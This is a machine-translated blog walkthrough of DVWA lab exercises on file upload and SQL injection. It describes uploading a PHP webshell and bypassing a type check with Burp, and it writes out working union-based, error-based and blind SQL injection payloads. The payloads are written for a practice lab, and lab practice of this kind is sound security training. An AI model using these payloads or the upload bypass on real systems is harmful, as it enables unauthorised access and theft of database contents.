当前位置:网站首页>DVWA range exercise 4
DVWA range exercise 4
2022-07-04 12:40:00 【chenjyboke】
file upload( Upload files )
low
File upload vulnerability , Usually due to the type of upload file , The content is not strictly filtered , Check , So that the attacker can get the server's webshell jurisdiction , Therefore, the harm caused by file upload vulnerability is often devastating ,Apache,Tomcat,Nginx And so on are exposed file upload vulnerabilities .
Check the source code and find that there are no restrictions on the content of file types. Check for file upload vulnerabilities .

Make a word Trojan , The file format is php Upload files . Connect with an ant sword . Backstage .



Mdeium
Check the source code and find that the file type limit should be jepg Or for png

Edit a sentence: the Trojan horse is jpg Format upload , Use burp Capture the package and change the file format to php Format , After success, use ant sword to connect


SQL injection(sql Inject )
low
1、 Determine the type of Injection
Input 1 success , Input 1 and1=1 success Input 1’ Failure
It is judged as digital injection

2、 guess sql The number of fields in the query statement
Input 1’ order by 2# success Input 1’ order by 3# Failure , Determine that the number of fields is 2


3、 Get users , database , Version number
Input 1' union select 1,concat(user(),database(),version())#
4, Gets the tables in the database
1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #
medium
1. After submission burp Grab the bag , modify id=1 Change it to 1 and 1=2 union select 1,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x #
Check in the response package

Repeat the above steps
2. Number of blasting tables : id=1 Change it to 1 and 1=2 union select 1,concat((select count(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#

3. Name of blasting table : id=1 Change it to 1 and 1=2 union select 1,concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#

4. Blast users Field name
id=1 Change it to 1 and 1=2 union select 1,concat((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 ),floor(rand(0)*2))x from information_schema.tables group by x#

SQL injection(sql Injection blind injection )
Determine the injection type and sql Inject the same
Judge the length of the database
Input 1’ and length(database())=1 #, Show that there is no ;
Input 1’ and length(database())=2 #, Show that there is no ;
Input 1’ and length(database())=3 #, Show that there is no ;
Input 1’ and length(database())=4 #, Show the presence of :

边栏推荐
- Global and Chinese market of ice water machines 2022-2028: Research Report on technology, participants, trends, market size and share
- Unity performance optimization reading notes - explore performance issues -profiler (2.1)
- Ml and NLP are still developing rapidly in 2021. Deepmind scientists recently summarized 15 bright research directions in the past year. Come and see which direction is suitable for your new pit
- [data clustering] section 3 of Chapter 4: DBSCAN performance analysis, advantages and disadvantages, and parameter selection methods
- 17.内存分区与分页
- Kivy教程之 08 倒计时App实现timer调用(教程含源码)
- MySQL advanced review
- C语言函数
- AI should take code agriculture? Deepmind offers a programming version of "Alpha dog" alphacode that surpasses nearly half of programmers!
- Xshell's ssh server rejected the password, failed to skip publickey authentication, and did not register with the server
猜你喜欢

Lecture 9

How to use "bottom logic" to see the cards in the world?

DC-5靶机

What if the chat record is gone? How to restore wechat chat records on Apple Mobile

DC-5 target
![[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 18](/img/1a/94ef8be5c06c2d1c52fc8ce7f03ea7.jpg)
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 18

The latest idea activation cracking tutorial, idea permanent activation code, the strongest in history

How to realize the function of Sub Ledger of applet?

VIM, another program may be editing the same file If this is the solution of the case

Introduction to the button control elevatedbutton of the fleet tutorial (the tutorial includes the source code)
随机推荐
LVS load balancing cluster deployment - Dr direct routing mode
Global and Chinese market for naval vessel maintenance 2022-2028: Research Report on technology, participants, trends, market size and share
Servlet learning notes
Paper notes ACL 2020 improving event detection via open domain trigger knowledge
Introduction to the button control elevatedbutton of the fleet tutorial (the tutorial includes the source code)
JD home programmers delete databases and run away. Talk about binlog, the killer of MySQL data backup
A few words explain redis cache penetration, breakdown, avalanche, and redis sentinel
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 17
Iterm tab switching order
queue
Global and Chinese market of ice water machines 2022-2028: Research Report on technology, participants, trends, market size and share
I want to talk about yesterday
C语言:求字符串的长度
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 19
Awk getting started to proficient series - awk quick start
Xshell's ssh server rejected the password, failed to skip publickey authentication, and did not register with the server
Play Sanzi chess easily
[data clustering] section 3 of Chapter 4: DBSCAN performance analysis, advantages and disadvantages, and parameter selection methods
It's hard to hear C language? Why don't you take a look at this (V) pointer
World document to picture